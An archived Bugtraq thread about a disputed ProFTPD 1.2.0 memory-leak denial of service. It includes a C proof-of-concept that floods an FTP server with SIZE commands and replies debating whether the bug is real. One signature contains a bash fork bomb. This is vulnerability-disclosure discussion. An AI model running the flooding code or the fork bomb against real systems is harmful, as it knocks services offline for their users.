5881661 2000-12-20 16:38 +0100 /20 rader/ Piotr Zurawski <szur@IX.RENET.PL>
Sänt av: joel@lysator.liu.se
Importerad: 2000-12-21 00:56 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: szur@IX.RENET.PL
Mottagare: Bugtraq (import) <14399>
Ärende: ProFTPD 1.2.0 Memory leakage - denial of service
------------------------------------------------------------
This is sample code to demonstrate effects of memory leak in
ProFTPD daemon. As far as I know all available versions up to date
(19.12.2000) are vulnerable to this.
This bug is not dangerous, if you run one instance of included code.
But wonder, what will happen, if someone will run about 20 sessions...
Wojciech Purczynski reported, that memory leak exists also, when other
FTP commands are invoked (eg. STAT).
Of course daemon will consume only as much, as it's defined in
limits of the user, daemon runs as. If you use setrlimit()in source,
pam, or ulimit before you start the daemon, this probably won't hurt
so much.
--
Piotr Zurawski [fb]
szur@ix.renet.pl
(5881661) --------------------------------(Ombruten)
Bilaga (text/plain) i text 5881662
Kommentar i text 5884743 av Michal Zalewski <lcamtuf@DIONE.IDS.PL>
5881662 2000-12-20 16:38 +0100 /136 rader/ Piotr Zurawski <szur@IX.RENET.PL>
Importerad: 2000-12-21 00:56 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: szur@IX.RENET.PL
Mottagare: Bugtraq (import) <14400>
Bilaga (text/plain) till text 5881661
Ärende: Bilaga till: ProFTPD 1.2.0 Memory leakage - denial of service
------------------------------------------------------------
/* Proftpd DoS
* by Piotr Zurawski (szur@ix.renet.pl)
* This source is just an example of memory leakage in proftpd-1.2.0(rc2)
* server discovered by Wojciech Purczynski.
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>
#define USERNAME "anonymous"
#define PASSWORD "dupa@dupa.pl"
#define HOWMANY 10000
void logintoftp();
void sendsizes();
int fd;
struct in_addr host;
unsigned short port = 21;
int tcp_connect(struct in_addr addr,unsigned short port);
int main(int argc, char **argv)
{
if (!resolve(argv[1],&host))
{
fprintf(stderr,"Hostname lookup failure\n");
exit(0);
}
fd=tcp_connect(host,port);
logintoftp(fd);
printf("Logged\n");
sendsizes(fd);
printf("Now check out memory usage of proftpd daemon");
printf("Resident set size (RSS) and virtual memory size (VSIZE)");
printf("fields in ps output");
}
void logintoftp()
{
char snd[1024], rcv[1024];
int n;
printf("Logging " USERNAME "/" PASSWORD "\r\n");
memset(snd, '\0', 1024);
sprintf(snd, "USER %s\r\n", USERNAME);
write(fd, snd, strlen(snd));
while((n=read(fd, rcv, sizeof(rcv))) > 0)
{
rcv[n] = 0;
if(strchr(rcv, '\n') != NULL)break;
}
memset(snd, '\0', 1024);
sprintf(snd, "PASS %s\r\n", PASSWORD);
write(fd, snd, strlen(snd));
while((n=read(fd, rcv, sizeof(rcv))) > 0)
{
rcv[n] = 0;
if(strchr(rcv, '\n') != NULL)
break;
}
return;
}
void sendsizes()
{
char snd[1024], rcv[1024];
unsigned long loop;
printf ("Sending %i size commands... \n", HOWMANY);
for(loop=0;loop<HOWMANY;loop++)
{
sprintf(snd, "SIZE /dadasjasojdasj/adhjaodhahasohasaoihroaha");
write(fd, snd, strlen(snd));
}
return;
}
int tcp_connect(struct in_addr addr,unsigned short port)
{
int fd;
struct sockaddr_in serv;
bzero(&serv,sizeof(serv)); serv.sin_addr=addr;
serv.sin_port=htons(port);
serv.sin_family=AF_INET;
if ((fd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) < 0)\
{
perror("socket");
exit(0);
}
if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0)
{
perror("connect");
exit(0);
}
return(fd);
}
int resolve(char *hostname,struct in_addr *addr)
{
struct hostent *res;
res=gethostbyname(hostname);
if (res==NULL)
return(0);
memcpy((char *)addr,res->h_addr,res->h_length);
return(1);
}
(5881662) ------------------------------------------
5884743 2000-12-21 17:29 +0100 /34 rader/ Michal Zalewski <lcamtuf@DIONE.IDS.PL>
Sänt av: joel@lysator.liu.se
Importerad: 2000-12-21 23:01 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: lcamtuf@DIONE.IDS.PL
Mottagare: Bugtraq (import) <14452>
Kommentar till text 5881661 av Piotr Zurawski <szur@IX.RENET.PL>
Ärende: Re: ProFTPD 1.2.0 Memory leakage - denial of service
------------------------------------------------------------
From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.30.0012211725510.15053-100000@dione.ids.pl>
On Wed, 20 Dec 2000, Piotr Zurawski wrote:
> This is sample code to demonstrate effects of memory leak in ProFTPD
> daemon. As far as I know all available versions up to date
> (19.12.2000) are vulnerable to this.
Heheh....
for(loop=0;loop<HOWMANY;loop++)
{
sprintf(snd, "SIZE /dadasjasojdasj/adhjaodhahasohasaoihroaha");
write(fd, snd, strlen(snd));
}
You are not sending newline characters at the end of each line. In
fact, you are sending really huge one-line command (this line will be
broken into separate lines on the other side, but only the first line
will start with "SIZE ..." command in most cases).
Btw. you might want to test such code against other services, IIRC
some services are vulnerable to very-long-input-line DoS (by memory
exhaustion) as long as they are not implementing reasonable timeouts
and limits.
--
_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=--=> Did you know that clones never use mirrors? <=--=
(5884743) --------------------------------(Ombruten)
5881889 2000-12-20 11:48 -0800 /30 rader/ <tj@RAD.GEOLOGY.WASHINGTON.EDU>
Sänt av: joel@lysator.liu.se
Importerad: 2000-12-21 05:58 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: tj@RAD.GEOLOGY.WASHINGTON.EDU
Mottagare: Bugtraq (import) <14409>
Kommentar till text 5877630 av Wojciech Purczynski <wp@ELZABSOFT.PL>
Ärende: Re: Memory leakage in proftpd leads to remote DoS
------------------------------------------------------------
From: tj@RAD.GEOLOGY.WASHINGTON.EDU
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.21.0012201146050.26013-100000@rad.geology.washington.edu>
> I've tested on proftd-1.2.0rc2 and people confirmed that this bug exist in
> the latest CVS version.
>
> I had no time to look at the code so no patch is currently available.
> Developers have just been informed.
>
> +--------------------------------------------------------------------+
> | Wojciech Purczynski wp@elzabsoft.pl http://www.elzabsoft.pl/~wp |
> | GSM: +48604432981 Linux Administrator SMS: wp-sms@elzabsoft.pl |
> +------ Public GnuPG Key: http://www.elzabsoft.pl/~wp/gpg.asc ------+
The developers of proftpd have tried to confirm this bug, using
scripts to issue the SIZE command for hundred thousands of
iterations, and failed to verify that it does indeed exist.
Versions of proftpd tested: pre10, rc1, rc2, and CVS. All failed to
show symptoms of this memory leak.
----------------------------------------------------------------------------
TJ Saunders tj@rad.geology.washington.edu
System Administrator Phone: (206) 685-8266
Remote Sensing Lab Fax: (206) 685-2379
University of Washington
----------------------------------------------------------------------------
(5881889) --------------------------------(Ombruten)
Kommentar i text 5887616 av Wojciech Purczynski <wp@ELZABSOFT.PL>
5887616 2000-12-22 13:53 +0100 /26 rader/ Wojciech Purczynski <wp@ELZABSOFT.PL>
Sänt av: joel@lysator.liu.se
Importerad: 2000-12-22 23:44 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: wp@ELZABSOFT.PL
Mottagare: Bugtraq (import) <14501>
Kommentar till text 5881889 av <tj@RAD.GEOLOGY.WASHINGTON.EDU>
Ärende: Re: Memory leakage in proftpd leads to remote DoS
------------------------------------------------------------
From: Wojciech Purczynski <wp@ELZABSOFT.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.30.0012221339240.22766-100000@alfa.elzabsoft.pl>
> The developers of proftpd have tried to confirm this bug, using scripts to
> issue the SIZE command for hundred thousands of iterations, and failed to
> verify that it does indeed exist.
>
> Versions of proftpd tested: pre10, rc1, rc2, and CVS. All failed to show
> symptoms of this memory leak.
I've investigated the problem a little bit more and it seems that this
memory leakage really _exist_ but only if proftpd runs in INETD mode.
If proftpd works as standalone daemon it works fine and does not
consume system memory.
Merry Christmas and Happy New Millenium :)
wp
+--------------------------------------------------------------------+
| Wojciech Purczynski wp@elzabsoft.pl http://www.elzabsoft.pl/~wp |
| GSM: +48604432981 Linux Administrator SMS: wp-sms@elzabsoft.pl |
+------ Public GnuPG Key: http://www.elzabsoft.pl/~wp/gpg.asc ------+
(5887616) --------------------------------(Ombruten)
Kommentar i text 5889692 av Rodrigo Barbosa (aka morcego) <rodrigob@CONECTIVA.COM.BR>
5889692 2000-12-22 18:07 -0200 /31 rader/ Rodrigo Barbosa (aka morcego) <rodrigob@CONECTIVA.COM.BR>
Sänt av: joel@lysator.liu.se
Importerad: 2000-12-25 01:17 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: rodrigob@CONECTIVA.COM.BR
Mottagare: Bugtraq (import) <14507>
Kommentar till text 5887616 av Wojciech Purczynski <wp@ELZABSOFT.PL>
Ärende: Re: Memory leakage in proftpd leads to remote DoS
------------------------------------------------------------
On Fri, Dec 22, 2000 at 01:53:01PM +0100, Wojciech Purczynski wrote:
> > The developers of proftpd have tried to confirm this bug, using scripts to
> > issue the SIZE command for hundred thousands of iterations, and failed to
> > verify that it does indeed exist.
> >
> > Versions of proftpd tested: pre10, rc1, rc2, and CVS. All failed to show
> > symptoms of this memory leak.
>
> I've investigated the problem a little bit more and it seems that this
> memory leakage really _exist_ but only if proftpd runs in INETD mode.
>
> If proftpd works as standalone daemon it works fine and does not consume
> system memory.
I'll not repeat here all we said and discussed before. If anyone want
any further information on this, please refer to
http://bugs.proftpd.net/show_bug.cgi?id=408
The official position is: this bug does not exist.
No one every showed us any way we could reproduce it. All reports only
showed lack of compreension and misguidance.
Tkx
--
Rodrigo Barbosa (morcego) - rodrigob at conectiva.com.br
Conectiva R&D Team - http://distro.conectiva.com.br
"Quis custodiet custodes?" - http://www.conectiva.com
(5889692) ------------------------------------------
Bilaga (application/pgp-signature) i text 5889693
5889693 2000-12-22 18:07 -0200 /10 rader/ Rodrigo Barbosa (aka morcego) <rodrigob@CONECTIVA.COM.BR>
Importerad: 2000-12-25 01:17 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: rodrigob@CONECTIVA.COM.BR
Mottagare: Bugtraq (import) <14508>
Bilaga (text/plain) till text 5889692
Ärende: Bilaga till: Re: Memory leakage in proftpd leads to remote DoS
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE6Q7Rnn5NdOMMM/nERArQkAJsEuC78FNRixp02oznIXJeuzP4lIACfWqZ6
ug66NE6M8oULsp9c5ueVC20=
=MTTH
-----END PGP SIGNATURE-----
(5889693) ------------------------------------------